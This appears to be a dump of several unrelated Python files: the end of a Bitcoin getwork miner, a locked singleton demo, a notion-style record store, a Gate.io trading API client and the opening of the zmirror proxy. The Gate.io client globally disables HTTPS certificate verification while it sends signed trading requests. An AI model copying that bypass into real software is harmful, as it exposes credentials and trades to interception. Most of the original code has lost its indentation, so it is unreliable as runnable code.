# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
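# --- Illustration (not part of the original script) ---------------------------
# Minimal sketch of the proof-of-work test performed in Miner.work(): the
# 80-byte header (76 static bytes + 4-byte little-endian nonce) is hashed twice
# with SHA-256, the digest is byte/word reversed as above, and the resulting
# 256-bit integer must be below the target. Written in the same Python 2 style
# as the rest of this script, reusing its bufreverse()/wordreverse() helpers.
def check_nonce(blk_hdr76, nonce, target):
	nonce_bin = struct.pack("<I", nonce)
	digest = hashlib.sha256(hashlib.sha256(blk_hdr76 + nonce_bin).digest()).digest()
	hash_str = wordreverse(bufreverse(digest)).encode('hex')
	return long(hash_str, 16) < target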
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2014
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
mysingleton2_with_lock.py
|
#!/usr/bin/python
# -*- coding:utf8 -*-
# Singleton with a lock added
import time
import threading
class Singleton(object):
_instance_lock = threading.Lock()
def __init__(self):
time.sleep(1)
print(self)
def __new__(cls, *args, **kwargs):
with cls._instance_lock:
if not hasattr(cls, '_instance'):
cls._instance = super(Singleton, cls).__new__(cls)
return cls._instance
def task():
obj = Singleton()
print(id(obj))
for i in range(10):
t = threading.Thread(target=task)
t.start()
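# --- Variant sketch (not part of the original) ---------------------------------
# The __new__ above acquires the lock on every instantiation. A common
# refinement is double-checked locking: only synchronize while the instance does
# not yet exist, so the lock is no longer contended once the singleton has been
# created.
class SingletonDCL(object):
    _instance_lock = threading.Lock()

    def __new__(cls, *args, **kwargs):
        if not hasattr(cls, '_instance'):
            with cls._instance_lock:
                if not hasattr(cls, '_instance'):
                    cls._instance = super(SingletonDCL, cls).__new__(cls)
        return cls._instance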
|
store.py
|
import datetime
import json
import threading
import uuid
from collections import defaultdict
from copy import deepcopy
from dictdiffer import diff
from inspect import signature
from threading import Lock
from pathlib import Path
from tzlocal import get_localzone
from .logger import logger
from .settings import CACHE_DIR
from .utils import extract_id
class MissingClass(object):
def __bool__(self):
return False
Missing = MissingClass()
class Callback(object):
def __init__(
self, callback, record, callback_id=None, extra_kwargs={}, watch_children=True
):
self.callback = callback
self.record = record
self.callback_id = callback_id or str(uuid.uuid4())
self.extra_kwargs = extra_kwargs
def __call__(self, difference, old_val, new_val):
kwargs = {}
kwargs.update(self.extra_kwargs)
kwargs["record"] = self.record
kwargs["callback_id"] = self.callback_id
kwargs["difference"] = difference
kwargs["changes"] = self.record._convert_diff_to_changelist(
difference, old_val, new_val
)
logger.debug("Firing callback {} with kwargs: {}".format(self.callback, kwargs))
# trim down the parameters we'll be passing, to include only those the callback will accept
params = signature(self.callback).parameters
if not any(["**" in str(param) for param in params.values()]):
# there's no "**kwargs" in the callback signature, so remove any unaccepted params
for arg in list(kwargs.keys()):
if arg not in params:
del kwargs[arg]
# perform the callback, gracefully handling any exceptions
try:
# trigger the callback within its own thread, so it won't block others if it's long-running
threading.Thread(target=self.callback, kwargs=kwargs, daemon=True).start()
except Exception as e:
logger.error(
"Error while processing callback for {}: {}".format(
repr(self.record), repr(e)
)
)
def __eq__(self, val):
if isinstance(val, str):
return self.callback_id.startswith(val)
elif isinstance(val, Callback):
return self.callback_id == val.callback_id
else:
return False
class RecordStore(object):
def __init__(self, client, cache_key=None):
self._mutex = Lock()
self._client = client
self._cache_key = cache_key
self._values = defaultdict(lambda: defaultdict(dict))
self._role = defaultdict(lambda: defaultdict(str))
self._collection_row_ids = {}
self._callbacks = defaultdict(lambda: defaultdict(list))
self._records_to_refresh = {}
self._pages_to_refresh = []
with self._mutex:
self._load_cache()
def _get(self, table, id):
return self._values[table].get(id, Missing)
def add_callback(self, record, callback, callback_id=None, extra_kwargs={}):
assert callable(
callback
), "The callback must be a 'callable' object, such as a function."
self.remove_callbacks(record._table, record.id, callback_id)
callback_obj = Callback(
callback, record, callback_id=callback_id, extra_kwargs=extra_kwargs
)
self._callbacks[record._table][record.id].append(callback_obj)
return callback_obj
def remove_callbacks(self, table, id, callback_or_callback_id_prefix=""):
"""
Remove all callbacks for the record specified by `table` and `id` that have a callback_id
starting with the string `callback_or_callback_id_prefix`, or are equal to the provided callback.
"""
if callback_or_callback_id_prefix is None:
return
callbacks = self._callbacks[table][id]
while callback_or_callback_id_prefix in callbacks:
callbacks.remove(callback_or_callback_id_prefix)
def _get_cache_path(self, attribute):
return str(
Path(CACHE_DIR).joinpath("{}{}.json".format(self._cache_key, attribute))
)
def _load_cache(self, attributes=("_values", "_role", "_collection_row_ids")):
if not self._cache_key:
return
for attr in attributes:
try:
with open(self._get_cache_path(attr)) as f:
if attr == "_collection_row_ids":
self._collection_row_ids.update(json.load(f))
else:
for k, v in json.load(f).items():
getattr(self, attr)[k].update(v)
except (FileNotFoundError, ValueError):
pass
def set_collection_rows(self, collection_id, row_ids):
if collection_id in self._collection_row_ids:
old_ids = set(self._collection_row_ids[collection_id])
new_ids = set(row_ids)
added = new_ids - old_ids
removed = old_ids - new_ids
for id in added:
self._trigger_callbacks(
"collection",
collection_id,
[("row_added", "rows", id)],
old_ids,
new_ids,
)
for id in removed:
self._trigger_callbacks(
"collection",
collection_id,
[("row_removed", "rows", id)],
old_ids,
new_ids,
)
self._collection_row_ids[collection_id] = row_ids
self._save_cache("_collection_row_ids")
def get_collection_rows(self, collection_id):
return self._collection_row_ids.get(collection_id, [])
def _save_cache(self, attribute):
if not self._cache_key:
return
with open(self._get_cache_path(attribute), "w") as f:
json.dump(getattr(self, attribute), f)
def _trigger_callbacks(self, table, id, difference, old_val, new_val):
for callback_obj in self._callbacks[table][id]:
callback_obj(difference, old_val, new_val)
def get_role(self, table, id, force_refresh=False):
self.get(table, id, force_refresh=force_refresh)
return self._role[table].get(id, None)
def get(self, table, id, force_refresh=False, limit=100):
id = extract_id(id)
# look up the record in the current local dataset
result = self._get(table, id)
# if it's not found, try refreshing the record from the server
if result is Missing or force_refresh:
if table == "block":
self.call_load_page_chunk(id,limit=limit)
else:
self.call_get_record_values(**{table: id})
result = self._get(table, id)
return result if result is not Missing else None
def _update_record(self, table, id, value=None, role=None):
callback_queue = []
with self._mutex:
if role:
logger.debug("Updating 'role' for {}/{} to {}".format(table, id, role))
self._role[table][id] = role
self._save_cache("_role")
if value:
logger.debug(
"Updating 'value' for {}/{} to {}".format(table, id, value)
)
old_val = self._values[table][id]
difference = list(
diff(
old_val,
value,
ignore=["version", "last_edited_time", "last_edited_by"],
expand=True,
)
)
self._values[table][id] = value
self._save_cache("_values")
if old_val and difference:
logger.debug("Value changed! Difference: {}".format(difference))
callback_queue.append((table, id, difference, old_val, value))
# run callbacks outside the mutex to avoid lockups
for cb in callback_queue:
self._trigger_callbacks(*cb)
def call_get_record_values(self, **kwargs):
"""
Call the server's getRecordValues endpoint to update the local record store. The keyword arguments map
table names into lists of (or singular) record IDs to load for that table. Use True to refresh all known
records for that table.
"""
requestlist = []
for table, ids in kwargs.items():
# ensure "ids" is a proper list
if ids is True:
ids = list(self._values.get(table, {}).keys())
if isinstance(ids, str):
ids = [ids]
# if we're in a transaction, add the requested IDs to a queue to refresh when the transaction completes
if self._client.in_transaction():
self._records_to_refresh[table] = list(
set(self._records_to_refresh.get(table, []) + ids)
)
continue
requestlist += [{"table": table, "id": extract_id(id)} for id in ids]
if requestlist:
logger.debug(
"Calling 'getRecordValues' endpoint for requests: {}".format(
requestlist
)
)
results = self._client.post(
"getRecordValues", {"requests": requestlist}
).json()["results"]
for request, result in zip(requestlist, results):
self._update_record(
request["table"],
request["id"],
value=result.get("value"),
role=result.get("role"),
)
def get_current_version(self, table, id):
values = self._get(table, id)
if values and "version" in values:
return values["version"]
else:
return -1
def call_load_page_chunk(self, page_id, limit=100):
if self._client.in_transaction():
self._pages_to_refresh.append(page_id)
return
data = {
"pageId": page_id,
"limit": limit,
"cursor": {"stack": []},
"chunkNumber": 0,
"verticalColumns": False,
}
recordmap = self._client.post("loadPageChunk", data).json()["recordMap"]
self.store_recordmap(recordmap)
def store_recordmap(self, recordmap):
for table, records in recordmap.items():
if not isinstance(records, dict):
continue
for id, record in records.items():
if not isinstance(record, dict):
continue
self._update_record(
table, id, value=record.get("value"), role=record.get("role")
)
def call_query_collection(
self,
collection_id,
collection_view_id,
search="",
type="table",
aggregate=[],
aggregations=[],
sort=[],
calendar_by="",
group_by="",
limit=50
):
assert not (
aggregate and aggregations
), "Use only one of `aggregate` or `aggregations` (old vs new format)"
# convert singletons into lists if needed
if isinstance(aggregate, dict):
aggregate = [aggregate]
if isinstance(sort, dict):
sort = [sort]
data = {
"collection": {
"id": collection_id,
"spaceId": self._client.current_space.id
},
"collectionView": {
"id": collection_view_id,
"spaceId": self._client.current_space.id
},
"loader": {
'reducers': {
'collection_group_results': {
'limit': limit,
'type': 'results',
},
},
"searchQuery": search,
'sort': sort,
"userTimeZone": str(get_localzone()),
"type": 'reducer',
},
}
response = self._client.post("queryCollection", data).json()
self.store_recordmap(response["recordMap"])
return response["result"]
def handle_post_transaction_refreshing(self):
for block_id in self._pages_to_refresh:
self.call_load_page_chunk(block_id)
self._pages_to_refresh = []
self.call_get_record_values(**self._records_to_refresh)
self._records_to_refresh = {}
def run_local_operations(self, operations):
"""
Called to simulate the results of running the operations on the server, to keep the record store in sync
even when we haven't completed a refresh (or we did a refresh but the database hadn't actually updated yet...)
"""
for operation in operations:
self.run_local_operation(**operation)
def run_local_operation(self, table, id, path, command, args):
with self._mutex:
path = deepcopy(path)
new_val = deepcopy(self._values[table][id])
ref = new_val
# loop and descend down the path until it's consumed, or if we're doing a "set", there's one key left
while (len(path) > 1) or (path and command != "set"):
comp = path.pop(0)
if comp not in ref:
ref[comp] = [] if "list" in command else {}
ref = ref[comp]
if command == "update":
assert isinstance(ref, dict)
ref.update(args)
elif command == "set":
assert isinstance(ref, dict)
if path:
ref[path[0]] = args
else:
# this is the case of "setting the top level" (i.e. creating a record)
ref.clear()
ref.update(args)
elif command == "listAfter":
assert isinstance(ref, list)
if "after" in args:
ref.insert(ref.index(args["after"]) + 1, args["id"])
else:
ref.append(args["id"])
elif command == "listBefore":
assert isinstance(ref, list)
if "before" in args:
ref.insert(ref.index(args["before"]), args["id"])
else:
ref.insert(0, args["id"])
elif command == "listRemove":
try:
ref.remove(args["id"])
except ValueError:
pass
self._update_record(table, id, value=new_val)
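# --- Illustration (not part of the original module) ----------------------------
# Standalone sketch of the path-descending update that run_local_operation()
# performs: walk `path` into a nested record, then apply the command at the end.
# The record, path, and args below are hypothetical placeholders.
if __name__ == "__main__":
    record = {"content": ["a", "b"]}
    path, command, args = ["content"], "listAfter", {"after": "a", "id": "c"}

    ref = record
    while (len(path) > 1) or (path and command != "set"):
        comp = path.pop(0)
        if comp not in ref:
            ref[comp] = [] if "list" in command else {}
        ref = ref[comp]
    ref.insert(ref.index(args["after"]) + 1, args["id"])

    print(record)  # {'content': ['a', 'c', 'b']}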
|
vngate.py
|
# encoding: utf-8
import urllib
import sys
import json
from time import time, sleep
from threading import Thread
import urllib.parse as urlparse
from datetime import datetime
import base64
import hmac
import hashlib
import json
import gzip, binascii, os
import http.client as httplib
import traceback
import ssl
from vnpy.trader.vtFunction import systemSymbolToVnSymbol , VnSymbolToSystemSymbol
import json
# Disable certificate verification for HTTPS
try:
    _create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
API_QUERY_URL = 'data.gate.io'
API_TRADE_URL = 'api.gate.io'
FUNCTIONCODE_GET_SYMBOS_GATE = "pairs"
FUNCTIONCODE_GET_MARKETINFO_GATE = "marketinfo" # market order parameters
FUNCTIONCODE_GET_MARKETLIST_GATE = "marketlist" # detailed market quotes
FUNCTIONCODE_POST_BALANCE_GATE = "balances"
FUNCTIONCODE_POST_BUY_GATE = "buy"
FUNCTIONCODE_POST_SELL_GATE = "sell"
FUNCTIONCODE_POST_CANCEL_ORDERS_GATE = "cancelOrder"
FUNCTIONCODE_POST_ORDER_INFO_GATE = "getOrder"
FUNCTIONCODE_POST_ORDER_LIST_GATE = "openOrders"
FUNCTIONCODE_POST_HISTORY_TRADE = "tradeHistory"
'''
Implemented via TradeApi.
'''
class Gate_TradeApi(object):
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.accessKey = ''
self.secretKey = ''
        self.active = False # API working status
        self.reqID = 0 # request ID counter
        #self.reqQueue = Queue() # request queue
        self.reqQueue = [] # request queue
        self.reqThread = Thread(target=self.processQueue) # request-processing thread
self.account_id = None
#----------------------------------------------------------------------
    def processRequest(self, req):
        """Process a single request."""
        # read the method and parameters
try:
url = req['url']
method = req['method']
kwargs = req['kwargs']
resource = req["resource"]
data = None
if method in [FUNCTIONCODE_GET_SYMBOS_GATE , FUNCTIONCODE_GET_MARKETINFO_GATE]:
data = self.httpGet( url, resource, '')
elif method in [FUNCTIONCODE_POST_BALANCE_GATE , FUNCTIONCODE_POST_BUY_GATE , FUNCTIONCODE_POST_SELL_GATE , FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , FUNCTIONCODE_POST_HISTORY_TRADE , FUNCTIONCODE_POST_ORDER_INFO_GATE , FUNCTIONCODE_POST_ORDER_LIST_GATE]:
data = self.httpPost( url, resource, kwargs )
            # attach extra information
if method == FUNCTIONCODE_POST_CANCEL_ORDERS_GATE:
data["systemID"] = kwargs["orderNumber"]
return data
except Exception as ex:
print(u'processRequest Exception:{},{}'.format(str(ex),traceback.format_exc()),file=sys.stderr)
return None
#----------------------------------------------------------------------
    def processQueue(self):
        """Process the requests waiting in the request queue."""
while self.active:
try:
if len(self.reqQueue) == 0:
sleep(0.1)
continue
(Type , req) = self.reqQueue[0]
callback = req['callback']
reqID = req['reqID']
try:
data = self.processRequest(req)
                    # request succeeded
if data != None :
callback(data, req, reqID)
except Exception as ex:
print(u'processQueue1 Exception:{},{}'.format(str(ex), traceback.format_exc()), file=sys.stderr)
self.reqQueue.pop(0)
sleep(0.1)
except Exception as ex:
print(u'processQueue2 Exception:{},{}'.format(str(ex), traceback.format_exc()), file=sys.stderr)
#----------------------------------------------------------------------
def is_same_req(self, req1 , req2):
flag = False
try:
if req1["kwargs"]["orderNumber"] == req2["kwargs"]["orderNumber"]:
return True
except Exception as ex:
print( "Error in is_same_req , req1:{} , req2:{}, ex:{}".format(req1 , req2,str(ex)))
return flag
#----------------------------------------------------------------------
    def sendRequest(self, url , resource , method, callback, kwargs = None,optional=None):
        """Send a request."""
        # increment the request ID
        self.reqID += 1
        # build the request dict and put it into the queue
req = {}
req['url'] = url
req['resource'] = resource
req['method'] = method
req['callback'] = callback
req['optional'] = optional
req['kwargs'] = kwargs
req['reqID'] = self.reqID
if method in [ FUNCTIONCODE_POST_BALANCE_GATE , FUNCTIONCODE_POST_ORDER_LIST_GATE]:
flag = False
for use_method ,r in self.reqQueue:
if use_method == method:
flag = True
break
if False == flag:
self.reqQueue.append( (method , req))
elif method in [ FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , FUNCTIONCODE_POST_ORDER_INFO_GATE]:
flag = False
for use_method, r in self.reqQueue:
if use_method == method:
if self.is_same_req( r , req) == True:
flag = True
break
if False == flag:
self.reqQueue.append( (method , req))
else:
self.reqQueue.append( (method , req))
#self.reqQueue.put(req)
        # return the request ID
return self.reqID
#----------------------------------------------------------------------
####################################################
    ## Active request methods
####################################################
#----------------------------------------------------------------------
    def init(self, accessKey, secretKey):
        """Initialize with API credentials and start the request-processing thread."""
self.accessKey = accessKey
self.secretKey = secretKey
self.active = True
self.reqThread.start()
#----------------------------------------------------------------------
    def exit(self):
        """Exit and stop the request-processing thread."""
self.active = False
        if self.reqThread.is_alive():
self.reqThread.join()
#----------------------------------------------------------------------
def getSign(self, params, secretKey):
bSecretKey = secretKey.encode(encoding='UTF-8')
sign = ''
for key in params.keys():
value = str(params[key])
sign += key + '=' + value + '&'
sign = sign[:-1]
bSign = sign.encode(encoding='UTF-8')
mySign = hmac.new(bSecretKey, bSign, hashlib.sha512).hexdigest()
return mySign
#----------------------------------------------------------------------
def httpGet(self, url, resource, params=''):
conn = httplib.HTTPSConnection(url, timeout=10)
conn.request("GET", resource + '/' + params)
response = conn.getresponse()
data = response.read().decode('utf-8')
return json.loads(data)
#----------------------------------------------------------------------
def httpPost(self, url, resource, params ):
headers = {
"Accept": "application/json",
'Content-Type': 'application/x-www-form-urlencoded',
"User-Agent": "Chrome/39.0.2171.71",
"KEY":self.accessKey,
"SIGN":self.getSign(params, self.secretKey)
}
conn = httplib.HTTPSConnection(url, timeout=10 )
tempParams = urllib.parse.urlencode(params) if params else ''
conn.request("POST", resource, tempParams, headers)
response = conn.getresponse()
data = response.read().decode('utf-8')
conn.close()
return json.loads(data)
#----------------------------------------------------------------------
def get_symbols(self):
print(u'get_symbols')
return self.sendRequest( API_QUERY_URL , "/api2/1/pairs" , FUNCTIONCODE_GET_SYMBOS_GATE , self.onAllSymbols , kwargs = {} , optional = None)
#----------------------------------------------------------------------
def get_market_info(self):
print(u'get_market_info')
return self.sendRequest( API_QUERY_URL , "/api2/1/marketinfo" , FUNCTIONCODE_GET_MARKETINFO_GATE , self.onMarketInfo , kwargs = {} , optional = None)
#----------------------------------------------------------------------
def get_balance(self):
# print(u'get_balance')
return self.sendRequest( API_TRADE_URL , "/api2/1/private/balances" ,FUNCTIONCODE_POST_BALANCE_GATE , self.onBalances , kwargs = {} , optional = None)
#----------------------------------------------------------------------
def spotBuy(self , symbol, rate, amount):
print(u'spotBuy(self , %s, %s, %s)' % ( symbol, str(rate), str(amount)))
kwargs = {'currencyPair': symbol,'rate':rate, 'amount':amount}
return self.sendRequest( API_TRADE_URL , "/api2/1/private/buy" , FUNCTIONCODE_POST_BUY_GATE , self.onSpotTrade , kwargs = kwargs , optional = None)
#----------------------------------------------------------------------
def spotSell(self , symbol, rate, amount):
print(u'spotSell(self , %s, %s, %s)' % (symbol , str(rate) , str(amount)))
kwargs = {'currencyPair': symbol,'rate':rate, 'amount':amount}
return self.sendRequest( API_TRADE_URL , "/api2/1/private/sell" , FUNCTIONCODE_POST_SELL_GATE , self.onSpotTrade , kwargs = kwargs , optional = None)
#----------------------------------------------------------------------
def spotTrade(self, symbol , amount, _type , price ):
if _type == "buy":
return self.spotBuy( symbol , price , amount )
elif _type == "sell":
return self.spotSell( symbol , price , amount )
else:
return None
#----------------------------------------------------------------------
def cancel_order(self , symbol , order_id):
# print(u'cancel_order(self , %s , %s)' % (symbol , str(order_id)))
kwargs = {"currencyPair" : symbol , "orderNumber" : order_id}
return self.sendRequest( API_TRADE_URL ,"/api2/1/private/cancelOrder" , FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , self.onCancelOrder , kwargs = kwargs , optional = None )
#----------------------------------------------------------------------
def getOrder( self, symbol , order_id ):
# print(u'getOrder( self, %s , %s )' % (symbol , order_id))
kwargs = {"currencyPair" : symbol , "orderNumber" : order_id}
return self.sendRequest( API_TRADE_URL , "/api2/1/private/getOrder" , FUNCTIONCODE_POST_ORDER_INFO_GATE , self.onOrderInfo , kwargs = kwargs , optional = None)
#----------------------------------------------------------------------
def listTradeHistory(self , symbol ):
kwargs = {"currencyPair" : symbol }
return self.sendRequest( API_TRADE_URL , "/api2/1/private/tradeHistory" , FUNCTIONCODE_POST_HISTORY_TRADE , self.onTradeList , kwargs = kwargs , optional = None)
#----------------------------------------------------------------------
def listOpenOrders( self):
# print(u'listOpenOrders( self)')
return self.sendRequest( API_TRADE_URL , "/api2/1/private/openOrders" , FUNCTIONCODE_POST_ORDER_LIST_GATE , self.onOrderList , kwargs = {} , optional = None)
#----------------------------------------------------------------------
def onBalances(self,data, req, reqID):
print(u'onBalances(self, data, req, reqID)')
print(data)
# ----------------------------------------------------------------------
def onAllSymbols(self,data, req, reqID):
print(u'onAllSymbols(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
def onMarketInfo(self,data, req, reqID):
print(u'onMarketInfo(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
def onSpotTrade(self,data, req, reqID):
print(u'onSpotTrade(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
def onCancelOrder(self,data, req, reqID):
print(u'onCancelOrder(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
def onOrderInfo(self,data, req, reqID):
print(u'onOrderInfo(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
def onOrderList(self,data, req, reqID):
print(u'onOrderList(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
def onTradeList(self,data, req, reqID):
print(u'onTradeList(self, data, req, reqID)')
print(data)
'''
Implemented via DataApi.
'''
class Gate_DataApi(object):
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.active = False
        self.taskInterval = 3 # delay (seconds) between polling rounds
        self.taskList = [] # list of subscribed tasks
        self.taskThread = Thread(target=self.run) # task-processing thread
#----------------------------------------------------------------------
    def init(self, interval, debug):
        """Initialize the polling interval and start the task thread."""
self.taskInterval = interval
self.DEBUG = debug
self.active = True
self.taskThread.start()
#----------------------------------------------------------------------
    def exit(self):
        """Exit and stop the task thread."""
self.active = False
        if self.taskThread.is_alive():
self.taskThread.join()
#----------------------------------------------------------------------
    def run(self):
        """Run continuously, polling every subscribed task."""
while self.active:
for url, resource ,callback ,params in self.taskList:
try:
data = self.http_get_request(url, resource , params )
if isinstance(data , dict):
data["currencyPair"] = params
callback( data )
except Exception as ex:
print(u'run exception:{},{}'.format(str(ex),traceback.format_exc()),file=sys.stderr)
sleep(self.taskInterval)
# ----------------------------------------------------------------------
def http_get_request(self, url, resource ,params ):
conn = httplib.HTTPSConnection(url, timeout=10)
conn.request("GET", resource + '/' + params)
try:
response = conn.getresponse()
data = response.read().decode('utf-8')
return json.loads(data)
except Exception as e:
print("httpGet failed, detail is:%s" %e)
return {"status":"fail","msg":e}
#----------------------------------------------------------------------
    def subscribeTick(self, symbol):
        """Subscribe to real-time ticker data."""
url = "/api2/1/ticker"
task = (API_QUERY_URL , url , self.onTick , symbol)
self.taskList.append(task)
#----------------------------------------------------------------------
    def subscribeTrades(self, symbol):
        """Subscribe to real-time trade history data."""
url = "/api2/1/tradeHistory"
task = (API_QUERY_URL , url, self.onTrades , symbol)
self.taskList.append(task)
#----------------------------------------------------------------------
    def subscribeOrderbooks(self, symbol):
        """Subscribe to real-time order book data."""
url = "/api2/1/orderBook"
task = (API_QUERY_URL , url, self.onDepth , symbol)
self.taskList.append(task)
#----------------------------------------------------------------------
    def onTick(self, data):
        """Real-time ticker push."""
print(data)
#----------------------------------------------------------------------
    def onTrades(self, data):
        """Real-time trades push."""
print(data)
#----------------------------------------------------------------------
    def onDepth(self, data):
        """Real-time order book depth push."""
print(data)
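# --- Usage sketch (not part of the original module) -----------------------------
# Hedged illustration of the request signing used in Gate_TradeApi.getSign():
# the parameters are joined as "k=v&k=v" and signed with HMAC-SHA512 using the
# secret key, then sent in the SIGN header. The key and parameters below are
# hypothetical placeholders, not real credentials.
if __name__ == "__main__":
    demo_params = {"currencyPair": "btc_usdt", "orderNumber": "123"}
    demo_secret = "my-secret-key".encode("utf-8")
    payload = "&".join("{}={}".format(k, v) for k, v in demo_params.items())
    demo_sign = hmac.new(demo_secret, payload.encode("utf-8"), hashlib.sha512).hexdigest()
    print(demo_sign)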
|
zmirror.py
|
#!/usr/bin/env python3
# coding=utf-8
import os
import sys
import re
import copy
import zlib
import sched
import queue
import base64
import random
import traceback
import ipaddress
import threading
from fnmatch import fnmatch
from time import time, sleep, process_time
from html import escape as html_escape
from datetime import datetime, timedelta
from urllib.parse import urljoin, urlsplit, urlunsplit, quote_plus
import urllib.parse
import requests
from flask import Flask, request, make_response, Response, redirect
from . import CONSTS
try:
# for python 3.5+ Type Hint
from typing import Union, List, Any, Tuple
except:
pass
try:  # used to detect the text encoding of html; cchardet is a C implementation of chardet and is very fast
from cchardet import detect as c_chardet
except:
cchardet_available = False
else:
cchardet_available = True
if os.path.abspath(os.getcwd()) != CONSTS.ZMIRROR_ROOT:
os.chdir(CONSTS.ZMIRROR_ROOT)
from .external_pkgs.ColorfulPyPrint import * # TODO: Migrate logging tools to the stdlib logging
if "ZMIRROR_UNITTEST" in os.environ:
    # the unittest_mode value obtained here from the environment variable will be overridden by the one in config;
    # config has not been loaded yet, so set a provisional value based on the env for now
unittest_mode = True
else:
unittest_mode = False
try:  # C implementation of lru_cache, faster than the Python built-in lru_cache
    from fastcache import lru_cache  # lru_cache is used to cache function results
except:
from functools import lru_cache
warnprint('package fastcache not found, '
'fallback to stdlib lru_cache, '
'no FUNCTION is effected, only maybe a bit slower. '
'Considering install it using "pip3 install fastcache"'
)
else:
if not unittest_mode:
infoprint('lru_cache loaded successfully from fastcache')
from .threadlocal import ZmirrorThreadLocal
if not unittest_mode:  # do not print these lines when running unittests
infoprint('zmirror version: {version} author: {author}'.format(version=CONSTS.__VERSION__, author=CONSTS.__AUTHOR__))
infoprint('Github: {site_url}'.format(site_url=CONSTS.__GITHUB_URL__))
try:  # load the default settings
from config_default import *
except: # coverage: exclude
errprint('the config_default.py is missing, this program may not works normally\n'
'config_default.py 文件丢失, 这会导致配置文件不向后兼容, 请重新下载一份 config_default.py')
    raise  # v0.23.1+ the program terminates when config_default.py is missing
try:  # load the user-defined config file, overriding same-named items in the default config
from config import *
except: # coverage: exclude
errprint(
        'the config.py is missing or contains errors, fallback to default configs(if we can), '
        'please COPY the config_default.py to config.py, and change its content, '
'or use the configs in the more_configs folder\n'
'自定义配置文件 config.py 丢失或存在错误, 将使用默认设置, 请将 config_default.py 复制一份为 config.py, '
'并根据自己的需求修改里面的设置'
'(或者使用 more_configs 中的配置文件)'
)
    raise  # v0.23.1+ the program terminates when the config file is missing or contains errors
else:
target_domain = target_domain.strip("./ \t").replace("https://", "").replace("http://", "")
infoprint('config file found, mirroring: ', target_domain)
if unittest_mode:
import importlib
importlib.reload(importlib.import_module("zmirror.utils"))
importlib.reload(importlib.import_module("zmirror.connection_pool"))
from .utils import *
from .lru_dict import LRUDict
from . import connection_pool
if local_cache_enable:
try:
from .cache_system import FileCache, get_expire_from_mime
cache = FileCache()
except: # coverage: exclude
traceback.print_exc()
errprint('Can Not Create Local File Cache, local file cache is disabled automatically.')
local_cache_enable = False
else:
if not unittest_mode:
infoprint('Local file cache enabled')
# ########## Basic Init #############
# Start loading settings from the config file; when reading the code you can skip this part and start from main_function()
ColorfulPyPrint_set_verbose_level(verbose_level)
if developer_enable_experimental_feature: # coverage: exclude
    # handle the experimental feature switches first
pass
my_host_name_no_port = my_host_name  # local hostname without the port number
if my_host_port is not None:
    my_host_name += ':' + str(my_host_port)  # local hostname with the port; standard ports carry no explicit port number
    my_host_name_urlencoded = quote_plus(my_host_name)  # url-encoded form of the hostname
else:
my_host_name_urlencoded = my_host_name
if external_domains is None:
external_domains = []
external_domains = list([d.strip("./ \t").replace("https://", "").replace("http://", "") for d in external_domains])
external_domains_set = set(external_domains or [])
allowed_domains_set = external_domains_set.copy()
allowed_domains_set.add(target_domain)
for _domain in external_domains: # for support domain with port
allowed_domains_set.add(urlsplit('http://' + _domain).hostname)
